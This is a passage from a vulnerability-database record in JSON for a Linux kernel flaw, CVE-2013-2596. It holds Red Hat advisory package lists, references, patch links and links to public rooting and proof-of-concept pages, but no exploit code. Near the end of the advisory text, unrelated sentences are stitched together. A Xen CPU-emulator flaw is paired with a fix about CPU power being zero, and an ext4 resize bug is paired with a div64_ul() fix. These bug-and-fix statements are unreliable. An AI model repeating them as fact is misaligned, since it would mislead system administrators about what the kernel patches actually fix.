6):\n\nSource:\nkernel-2.6.32-504.el6.src.rpm\n\ni386:\nkernel-2.6.32-504.el6.i686.rpm\nkernel-debug-2.6.32-504.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debug-devel-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm\nkernel-devel-2.6.32-504.el6.i686.rpm\nkernel-headers-2.6.32-504.el6.i686.rpm\nperf-2.6.32-504.el6.i686.rpm\nperf-debuginfo-2.6.32-504.el6.i686.rpm\npython-perf-debuginfo-2.6.32-504.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-504.el6.noarch.rpm\nkernel-doc-2.6.32-504.el6.noarch.rpm\nkernel-firmware-2.6.32-504.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-504.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-504.el6.ppc64.rpm\nkernel-debug-2.6.32-504.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-504.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-504.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-504.el6.ppc64.rpm\nkernel-devel-2.6.32-504.el6.ppc64.rpm\nkernel-headers-2.6.32-504.el6.ppc64.rpm\nperf-2.6.32-504.el6.ppc64.rpm\nperf-debuginfo-2.6.32-504.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-504.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-504.el6.s390x.rpm\nkernel-debug-2.6.32-504.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.s390x.rpm\nkernel-debug-devel-2.6.32-504.el6.s390x.rpm\nkernel-debuginfo-2.6.32-504.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-504.el6.s390x.rpm\nkernel-devel-2.6.32-504.el6.s390x.rpm\nkernel-headers-2.6.32-504.el6.s390x.rpm\nkernel-kdump-2.6.32-504.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-504.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-504.el6.s390x.rpm\nperf-2.6.32-504.el6.s390x.rpm\nperf-debuginfo-2.6.32-504.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-504.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-504.el6.x86_64.rpm\nkernel-debug-2.6.32-504.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nkernel-devel-2.6.32-504.el6.x86_64.rpm\nkernel-headers-2.6.32-504.el6.x86_64.rpm\nperf-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm\nperf-debuginfo-2.6.32-504.el6.i686.rpm\npython-perf-2.6.32-504.el6.i686.rpm\npython-perf-debuginfo-2.6.32-504.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-504.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-504.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-504.el6.ppc64.rpm\nperf-debuginfo-2.6.32-504.el6.ppc64.rpm\npython-perf-2.6.32-504.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-504.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-504.el6.s390x.rpm\nkernel-debuginfo-2.6.32-504.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-504.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-504.el6.s390x.rpm\nperf-debuginfo-2.6.32-504.el6.s390x.rpm\npython-perf-2.6.32-504.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-504.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-504.el6.src.rpm\n\ni386:\nkernel-2.6.32-504.el6.i686.rpm\nkernel-debug-2.6.32-504.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debug-devel-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm\nkernel-devel-2.6.32-504.el6.i686.rpm\nkernel-headers-2.6.32-504.el6.i686.rpm\nperf-2.6.32-504.el6.i686.rpm\nperf-debuginfo-2.6.32-504.el6.i686.rpm\npython-perf-debuginfo-2.6.32-504.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-504.el6.noarch.rpm\nkernel-doc-2.6.32-504.el6.noarch.rpm\nkernel-firmware-2.6.32-504.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-504.el6.x86_64.rpm\nkernel-debug-2.6.32-504.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nkernel-devel-2.6.32-504.el6.x86_64.rpm\nkernel-headers-2.6.32-504.el6.x86_64.rpm\nperf-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-2.6.32-504.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm\nperf-debuginfo-2.6.32-504.el6.i686.rpm\npython-perf-2.6.32-504.el6.i686.rpm\npython-perf-debuginfo-2.6.32-504.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.el6.x86_64.rpm\npython-perf-2.6.32-504.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-2596.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4483.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0181.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3122.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3601.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-4608.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-4653.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-4654.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-4655.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-5045.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-5077.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/kernel.html#RHSA-2014-1392\nhttps://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html-single/6.6_Release_Notes/index.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUPKxFXlSAg2UNWIIRAkwDAJ9mvXUXLdfD/FRwrdkPl2+B610zpACdHa+q\nm8JupSzJWBzh/fi0DUX0uyI=\n=D7cp\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2013-2596, Important)\n\n* It was found that the Xen hypervisor x86 CPU emulator implementation did\nnot correctly handle certain instructions with segment overrides,\npotentially resulting in a memory corruption. \nThe provided patch ensures that the division is only performed if the CPU\npower is not zero, and the aforementioned panic no longer occurs. \n(BZ#1209728)\n\n* Prior to this update, a bug occurred when performing an online resize of\nan ext4 file system which had been previously converted from ext3. The provided patch fixes online resizing\nfor such file systems by limiting the blockgroup search loop for non-extent\nfiles, and the mentioned kernel crash no longer occurs. This bug has been fixed by defining a new div64_ul()\ndivision function and correcting the affected calculation in the\nproc_sched_show_task() function. (BZ#1199898)\n\n* When repeating a Coordinated Universal Time (UTC) value during a leap\nsecond (when the UTC time should be 23:59:60), the International Atomic\nTime (TAI) timescale previously stopped as the kernel NTP code incremented\nthe TAI offset one second too late. A patch has been provided, which fixes\nthe bug by incrementing the offset during the leap second itself. Now, the\ncorrect TAI is set during the leap second",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "db": "BID",
        "id": "59264"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "db": "PACKETSTORM",
        "id": "122138"
      },
      {
        "db": "PACKETSTORM",
        "id": "130871"
      },
      {
        "db": "PACKETSTORM",
        "id": "131312"
      },
      {
        "db": "PACKETSTORM",
        "id": "128664"
      },
      {
        "db": "PACKETSTORM",
        "id": "136240"
      },
      {
        "db": "PACKETSTORM",
        "id": "131409"
      }
    ],
    "trust": 3.06
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-2596",
        "trust": 4.0
      },
      {
        "db": "BID",
        "id": "59264",
        "trust": 2.0
      },
      {
        "db": "JUNIPER",
        "id": "JSA10761",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-2596",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "122138",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130871",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131312",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128664",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136240",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131409",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "db": "BID",
        "id": "59264"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "PACKETSTORM",
        "id": "122138"
      },
      {
        "db": "PACKETSTORM",
        "id": "130871"
      },
      {
        "db": "PACKETSTORM",
        "id": "131312"
      },
      {
        "db": "PACKETSTORM",
        "id": "128664"
      },
      {
        "db": "PACKETSTORM",
        "id": "136240"
      },
      {
        "db": "PACKETSTORM",
        "id": "131409"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "id": "VAR-201304-0124",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      }
    ],
    "trust": 1.2203703666666668
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      }
    ]
  },
  "last_update_date": "2024-01-17T18:59:03.530000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-3.8.9",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v3.x/changelog-3.8.9"
      },
      {
        "title": "vm: convert fb_mmap to vm_iomap_memory() helper",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/fc9bbca8f650e5f738af8806317c0a041a48ae4a"
      },
      {
        "title": "vm: add vm_iomap_memory() helper function",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/b4cbb197c7e7a68dbad0d491242e3ca67420c13e"
      },
      {
        "title": "vm: convert fb_mmap to vm_iomap_memory() helper",
        "trust": 0.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=fc9bbca8f650e5f738af8806317c0a041a48ae4a"
      },
      {
        "title": "vm: add vm_iomap_memory() helper function",
        "trust": 0.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=b4cbb197c7e7a68dbad0d491242e3ca67420c13e"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.motorola.com/us/consumers/home"
      },
      {
        "title": "RHSA-2015:0782",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0782.html"
      },
      {
        "title": "RHSA-2015:0695",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0695.html"
      },
      {
        "title": "RHSA-2015:0803",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0803.html"
      },
      {
        "title": "MDVSA-2013:176",
        "trust": 0.8,
        "url": "http://www.mandriva.com/en/support/security/advisories/advisory/mdvsa-2013:176/?name=mdvsa-2013:176"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.qualcomm.co.jp/"
      },
      {
        "title": "Multiple  Motorola Product digital error vulnerability fixes",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=186282"
      },
      {
        "title": "Red Hat: CVE-2013-2596",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2013-2596"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71"
      },
      {
        "title": "Reverse-Engineering-toolkit\nDirectory\nIDA\nGhidra\nx64dbg\nOllyDbg\nWinDBG\nAndroid\nApple\u0026\u0026iOS\u0026\u0026iXxx\nCuckoo\nDBI",
        "trust": 0.1,
        "url": "https://github.com/geeksniper/reverse-engineering-toolkit "
      },
      {
        "title": "\u6240\u6709\u6536\u96c6\u7c7b\u9879\u76ee\nAndroid\n\u76ee\u5f55\n\u8d44\u6e90\u6536\u96c6\n\u77e5\u540d\u5206\u6790\u5de5\u5177\n\u5404\u7c7bApp\nTopic\n\u5176\u4ed6\n\u5de5\u5177\n\u6587\u7ae0\n\u8d21\u732e",
        "trust": 0.1,
        "url": "https://github.com/alphaseclab/android-security "
      },
      {
        "title": "TOP\nTable of Contents\nDonation",
        "trust": 0.1,
        "url": "https://github.com/jerry123s/all-poc "
      },
      {
        "title": "TOP\nTable of Contents\nDonation",
        "trust": 0.1,
        "url": "https://github.com/weeka10/-hktalent-top "
      },
      {
        "title": "TOP\nTable of Contents\nDonation",
        "trust": 0.1,
        "url": "https://github.com/cyberanand1337x/bug-bounty-2022 "
      },
      {
        "title": "Known Exploited Vulnerabilities Detector",
        "trust": 0.1,
        "url": "https://github.com/ostorlab/kev "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-189",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "http://www.droid-life.com/2013/04/09/root-method-released-for-droid-razr-hd-running-android-4-1-2-other-devices-too/"
      },
      {
        "trust": 2.8,
        "url": "http://www.droidrzr.com/index.php/topic/15208-root-motochopper-yet-another-android-root-exploit/"
      },
      {
        "trust": 1.4,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-2596"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0695.html"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0782.html"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0803.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/59264"
      },
      {
        "trust": 1.1,
        "url": "https://github.com/torvalds/linux/commit/b4cbb197c7e7a68dbad0d491242e3ca67420c13e"
      },
      {
        "trust": 1.1,
        "url": "http://forum.xda-developers.com/showthread.php?t=2255491"
      },
      {
        "trust": 1.1,
        "url": "https://github.com/torvalds/linux/commit/fc9bbca8f650e5f738af8806317c0a041a48ae4a"
      },
      {
        "trust": 1.1,
        "url": "http://www.kernel.org/pub/linux/kernel/v3.x/changelog-3.8.9"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=linux-kernel\u0026m=136616837923938\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:176"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
      },
      {
        "trust": 1.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761"
      },
      {
        "trust": 1.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=b4cbb197c7e7a68dbad0d491242e3ca67420c13e"
      },
      {
        "trust": 1.1,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=fc9bbca8f650e5f738af8806317c0a041a48ae4a"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2596"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2596"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2013-2596"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "http://www.motorola.com/us"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8159"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5471"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5472"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2014-8159"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2014-5472"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2014-5471"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/189.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/alphaseclab/android-security"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1796"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6549"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0217"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1797"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-6547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0290"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3223"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1798"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2634"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2146"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3235"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0311"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1792"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0216"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3234"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0228"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3229"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0914"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3225"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1767"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1796"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1979"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2635"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3227"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1767"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-6548"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1860"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5532"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0914"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1929"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1763"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1929"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2141"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2146"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1792"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-6549"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0311"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2141"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1798"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2546"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3224"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0290"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3231"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3232"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1860"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1797"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2634"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2635"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-5532"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0217"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1979"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1763"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1848"
      },
      {
